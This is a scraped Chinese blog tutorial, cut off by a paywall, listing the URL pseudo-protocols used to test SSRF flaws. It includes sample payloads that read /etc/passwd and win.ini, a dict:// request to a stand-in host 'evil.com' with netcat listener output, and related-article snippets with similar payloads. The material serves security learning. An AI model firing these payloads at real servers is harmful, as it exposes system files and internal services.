SSRF中的URL的伪协议

最新推荐文章于 2025-04-12 21:59:20 发布

最新推荐文章于 2025-04-12 21:59:20 发布

阅读量2.2k

点赞数 1

分类专栏： web安全文章标签： web安全

本文链接：https://blog.youkuaiyun.com/m0_55754984/article/details/120214896

版权

当我们发现SSRF漏洞后，首先要做的事情就是测试所有可用的URL伪协议

0x01 类型

file:///
dict://
sftp://
ldap://
tftp://
gopher://

file://

这种URL Schema可以尝试从文件系统中获取文件：

http://example.com/ssrf.php?url=file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini

如果该服务器阻止对外部站点发送HTTP请求，或启用了白名单防护机制，只需使用如下所示的URL Schema就可以绕过这些限制：

dict://

这种URL Scheme能够引用允许通过DICT协议使用的定义或单词列表：

http://example.com/ssrf.php?dict://evil.com:1337/ 
evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337[tcp/*] 
accepted (family 2, sport 31126)CLIENT libcurl 7.40.0

sftp://

在这里，Sftp代表SSH文件传输协议（SSH File Transfer Protocol），或安全文件传输协议（Secure File Transfer Protocol），这是一种与SSH打包在一起的单独协议，它运行在安全连接上，并以类似的方式进行工作。

http://example.com/ssrf

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

关注关注

1
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

SSRF（3）伪协议读取文件&Gopher协议的利用

m0_64417923的博客

05-12

4290

一：Http、Dict和file等协议的利用 1，内网访问所以构造： /?url=http://127.0.0.1/flag.php 得到： ctfhub{ce475b59a4baee959112777b} 2，伪协议读取文件最经典的PHP伪协议就是file:///协议了，可以用来读取php源码构造payload： /?url=file:///var/www/html/flag.php 得到：在单击右键查看源代码：得到flag： ctfh..

SSRF漏洞学习

qi_SJQ_的博客

01-02

1064

1.原理及成因 ssrf：服务端请求伪造，这个漏洞危害其实挺大的，外网直接打到内网，利用一台服务器上的web服务进而访问内网其他资产信息。 SSRF 形成的原因：大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容，加载指定地址的图片，下载等等。简而言之就是无法外网直接访问内网的其他主机，就能这个存在ssrf的主机当跳板来实现访问内网。 2.危险函数主要是curl()函数，不过别的类似可以利用协议引入的函数也可以，比如file_get_.

参与评论您还未登录，请先登录后发表或查看评论

SSRF中伪协议学习

csjjjd的博客

07-24

1621

2.dict伪协议 dict 协议最初是为 UNIX 和类 UNIX 系统设计的，用于从远程服务器上查询词典或字典内容。在互联网上存在一些公共的 dict 服务器，允许用户通过 dict 协议查询广泛的词典资源。

Web攻防—SSRF服务端请求伪造&Gopher伪协议&无回显利用

最新发布

2301_76227305的博客

04-12

1302

最后，以上仅为个人的拙见，如何有不对的地方，欢迎各位师傅指正与补充，有兴趣的师傅可以一起交流学习。

SSRF漏洞伪协议学习

m0_73927535的博客

04-07

2596

在有SSRF漏洞的服务器或主机提供的网页中使用一些伪协议来获取内网信息。这里可能需要ssrf漏洞靶场来做实验。

SSRF漏洞file伪协议之[网鼎杯 2018]Fakebook1

qq_58970968的博客

07-06

1624

关于SSRF漏洞（服务器端伪造）参考SSRF漏洞原理攻击与防御(超详细总结)_零点敲代码的博客-优快云博客_ssrf漏洞防御SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）SSRF攻击可能存在任何语言编写的应用，接下来将举例php中可能存在SSRF漏洞的函数。1、file_get_

SSRF伪协议

Lhy1963245411的博客

07-26

1074

学习自从文件系统中获取文件内容，如file:///etc/passwd可用于端口扫描SSH文件传输协议或安全文件传输协议轻量级目录访问协议简单文件传输协议分布式文档传输协议。

ssrf伪协议

03-22

### SSRF漏洞中的伪协议使用场景及防御措施 #### 伪协议的定义与常见类型 伪协议是指一些特殊的URL前缀，它们并不指向真实的网络地址，而是用于本地文件读取或其他特殊操作。在SSRF漏洞中，攻击者常通过伪协议实现...

ssrf dict伪协议

08-09

攻击者可以通过构造dict伪协议的URL，将目标服务器发送到一个字典服务中，进而获取敏感信息或者执行未经授权的操作。例如，攻击者可以构造如下的URL： dict://attacker.com:80/getSensitiveData 在这个例子中，...

ssrf漏洞伪协议&绕过

weixin_67289581的博客

10-29

1285

SSRF(Server-Side Request Forgery:服务器端请求伪造)一种由攻击者构造形成由服务端发起请求的一个安全漏洞;一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。

WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点

SuperherRo的博客

09-18

2432

1、SSRF-原理-外部资源加载 2、SSRF-利用-伪协议&无回显 3、SSRF-挖掘-业务功能&URL参数

SSRF（服务器端请求伪造）

qq_56289291的博客

08-02

1770

服务器端请求伪造（SSRFServer-SideRequestForgery）是一个Web安全漏洞，指攻击者诱导服务器将HTTP请求发送到攻击者选择的一个目标上。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。例如通过127.0.0.1就能访问本机，192.168.*.*就能访问内网C段。...

伪协议的使用方法（SSRF，XXE，文件包含）

qz362228的博客

06-12

2231

php://input——读取POST数据，用于执行php代码 file://伪协议——读取文件内容 phar://——读取压缩包文件内容 zip://——读取压缩包文件内容 . data://——以get方式提交数据，执行php代码。二、文件包含，XXE，XSSRF利用伪协议的异同 SSRF ssrf利用伪协议 类型：...

Day57：WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点

qq_61553520的博客

03-30

2461

小迪安全-Day57：WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点

php中ssrf的伪协议详解以及实战

2301_79218873的博客

02-15

1069

gopher协议不同于其他协议，像file、http、ftp、dict这些协议只能get请求，而gopher协议是构造请求报文去访问，get、post都能做，报文都能自己构造了岂不是就可以乱杀，curl_exec()：curl函数引起的SSRF漏洞不支持直接利用PHP协议,curl是用于网络通信的工具，而PHP协议是PHP内部的流包装器，二者用途不同。file_get_contents()：该函数不支持dict协议，file_get_contents()的目的就是识别内容的，不同用于间接扫描。

SSRF服务端请求&Gopher伪协议&白盒测试

2301_81155391的博客

12-29

1329

是什么SSRF？这个简单点说就是服务端的请求伪造就是这个如果是个请求图片的网站他的目的是请求外部其他网站的图片但是 SSRF指的是让他请求本地的图片再展示出来请求的是他的服务器上的图片SSRF(Server-Side Request Forgery:服务器端请求伪造)一种由攻击者构造形成由服务端发起请求的一个安全漏洞;一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）

SSRF一—WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点

zyw268的博客

03-25

442

黑盒WEB-业务功能&URL关键字。SSRF-原理&挖掘&利用&修复。白盒CTF-绕过&伪协议&审计点。

网络安全进阶学习第四课——SSRF服务器请求伪造

p36273的博客

07-01

1240

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是指攻击者能够从易受攻击的Web应用程序发送精心设计的请求的对其他网站进行攻击。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统，也就是内网。利用一个可以发起网络请求的服务，当做跳板来攻击其它服务。

初识——服务器端请求伪造（SSRF）

sGanYu

08-16

1596

SSRF:Server-Side Request Forgery服务器请求伪造。一种由攻击者构造请求，由服务器端发起请求的安全漏洞，漏洞属于信息泄露的一种。一般情况下，SSRF的攻击目标是网站的内部系统（正因为请求是由服务器端发起的，所以服务器能请求到与自身相连而与外网隔离的内部系统），只要当前服务器有向其他服务器发送请求的地方都可能存在SSRF漏洞。漏洞原理：大多数web应用都提供了从其他服务器上获取数据的功能，web应用根据用户指定的URL向其他服务器请求图片，文件等资源。一旦..